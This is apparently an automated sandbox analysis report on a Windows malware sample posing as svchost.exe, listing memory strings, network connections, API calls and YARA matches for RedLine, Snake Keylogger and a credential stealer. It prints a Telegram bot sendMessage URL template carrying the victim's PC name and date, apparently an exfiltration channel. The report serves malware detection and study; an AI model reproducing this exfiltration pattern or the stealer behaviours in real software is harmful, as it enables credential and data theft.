              Source: svchost.exe, 00000004.00000002.3867759274.00000000054D5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.00000000059E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
              Source: svchost.exe, 00000004.00000002.3867759274.00000000054D5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.00000000059E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:910646%0D%0ADate%20a
              Source: svchost.exe, 00000004.00000002.3870187327.0000000006473000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3870187327.00000000066BD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3870001384.0000000006983000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3870001384.0000000006BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: svchost.exe, 00000004.00000002.3870187327.0000000006473000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3870187327.00000000066BD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3870001384.0000000006983000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3870001384.0000000006BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: svchost.exe, 00000004.00000002.3870187327.0000000006473000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3870187327.00000000066BD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3870001384.0000000006983000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3870001384.0000000006BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: svchost.exe, 00000007.00000002.3867939466.0000000005A7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
              Source: svchost.exe, 00000004.00000002.3867759274.0000000005565000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005A76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
              Source: svchost.exe, 00000004.00000002.3870187327.0000000006473000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3870187327.00000000066BD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3870001384.0000000006983000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3870001384.0000000006BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: svchost.exe, 00000004.00000002.3870187327.0000000006473000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3870187327.00000000066BD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3870001384.0000000006983000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3870001384.0000000006BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: svchost.exe, 00000004.00000002.3870187327.0000000006473000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3870187327.00000000066BD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3870001384.0000000006983000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3870001384.0000000006BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: svchost.exe, 00000004.00000002.3867759274.00000000054D5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3867759274.000000000543F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3867759274.00000000054AF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.00000000059BF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.000000000594F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
              Source: svchost.exe, 00000004.00000002.3867759274.000000000543F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3873029873.0000000007990000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000004.00000002.3874251847.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000004.00000003.1595308380.000000000326E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3866487392.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000007.00000002.3866560120.0000000003774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1816719555.000000000366C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3873308858.0000000008140000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.000000000594F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
              Source: svchost.exe, 00000007.00000002.3867939466.0000000005979000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
              Source: svchost.exe, 00000004.00000002.3867759274.00000000054D5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3867759274.000000000546A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3867759274.00000000054AF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.00000000059BF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005979000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
              Source: svchost.exe, 00000004.00000002.3873466739.0000000007B44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3867759274.0000000005547000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3873371641.0000000007B25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3866456507.0000000003691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3872746042.0000000007F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.3165251754.0000000003691000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
              Source: svchost.exe, 00000004.00000002.3870187327.0000000006473000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3870187327.00000000066BD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3870001384.0000000006983000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3870001384.0000000006BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: svchost.exe, 00000004.00000002.3870187327.0000000006473000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.3870187327.00000000066BD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3870001384.0000000006983000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3870001384.0000000006BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: svchost.exe, 00000007.00000002.3867939466.0000000005AAC000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005A9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
              Source: svchost.exe, 00000007.00000002.3867939466.0000000005A9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/H
              Source: svchost.exe, 00000004.00000002.3867759274.0000000005596000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3867939466.0000000005AA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49744 version: TLS 1.2
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

              System Summary

              barindex
              Source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 4.2.svchost.exe.7d50000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 4.2.svchost.exe.7d50000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 4.2.svchost.exe.7d50000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 7.2.svchost.exe.8140f20.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 7.2.svchost.exe.8140f20.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 7.2.svchost.exe.8140f20.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 7.3.svchost.exe.366c000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 4.2.svchost.exe.7990000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 4.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 7.3.svchost.exe.366c000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 4.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 4.2.svchost.exe.7990000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 4.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 4.2.svchost.exe.3374f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 7.3.svchost.exe.366c000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 4.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 4.3.svchost.exe.326e000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 4.2.svchost.exe.7990000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 4.3.svchost.exe.326e000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 7.3.svchost.exe.366cf20.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 4.2.svchost.exe.7990000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 7.3.svchost.exe.366cf20.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 4.3.svchost.exe.326e000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 4.2.svchost.exe.7990000.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 7.3.svchost.exe.366cf20.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 4.2.svchost.exe.7990000.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 4.2.svchost.exe.7990f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 4.2.svchost.exe.7990f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 7.2.svchost.exe.81e0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 7.2.svchost.exe.81e0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 4.2.svchost.exe.3374f2e.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 7.2.svchost.exe.3774f2e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 7.2.svchost.exe.81e0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 7.2.svchost.exe.3774f2e.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 7.2.svchost.exe.81e0000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 4.3.svchost.exe.326ef20.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 4.2.svchost.exe.7990f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 7.2.svchost.exe.8140f20.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 7.2.svchost.exe.8140f20.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 7.2.svchost.exe.8140f20.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 7.2.svchost.exe.3774f2e.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 4.3.svchost.exe.326e000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 4.3.svchost.exe.326e000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 4.3.svchost.exe.326ef20.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 4.3.svchost.exe.326ef20.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 7.2.svchost.exe.81e0000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 7.2.svchost.exe.8140000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 7.3.svchost.exe.366cf20.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 7.3.svchost.exe.366cf20.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 4.3.svchost.exe.326e000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 7.3.svchost.exe.366cf20.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 4.2.svchost.exe.7d50000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 7.2.svchost.exe.81e0000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 4.2.svchost.exe.7d50000.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 4.2.svchost.exe.7d50000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 4.3.svchost.exe.326ef20.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 4.2.svchost.exe.7990f20.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 7.2.svchost.exe.3774f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 4.3.svchost.exe.326ef20.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 7.2.svchost.exe.8140000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 7.2.svchost.exe.8140000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 4.2.svchost.exe.7990f20.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 4.3.svchost.exe.326ef20.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 4.2.svchost.exe.7990f20.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 7.2.svchost.exe.3774f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 7.2.svchost.exe.3774f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 7.3.svchost.exe.366c000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 7.2.svchost.exe.8140000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 7.3.svchost.exe.366c000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 7.2.svchost.exe.8140000.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 7.3.svchost.exe.366c000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 7.2.svchost.exe.8140000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000007.00000002.3873911708.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000004.00000002.3873029873.0000000007990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000004.00000002.3873029873.0000000007990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000004.00000002.3873029873.0000000007990000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000004.00000002.3874251847.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000004.00000002.3874251847.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000004.00000002.3874251847.0000000007D50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000007.00000002.3865282066.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000007.00000002.3866560120.0000000003774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000004.00000002.3865281483.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000004.00000003.1595308380.000000000326E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000004.00000003.1595308380.000000000326E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000004.00000003.1595308380.000000000326E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000004.00000002.3866487392.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000007.00000003.1816719555.000000000366C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000007.00000003.1816719555.000000000366C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000007.00000003.1816719555.000000000366C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: 00000007.00000002.3873308858.0000000008140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000007.00000002.3873308858.0000000008140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000007.00000002.3873308858.0000000008140000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
              Source: Process Memory Space: svchost.exe PID: 8104, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: svchost.exe PID: 7524, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_004096A00_2_004096A0
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0042200C0_2_0042200C
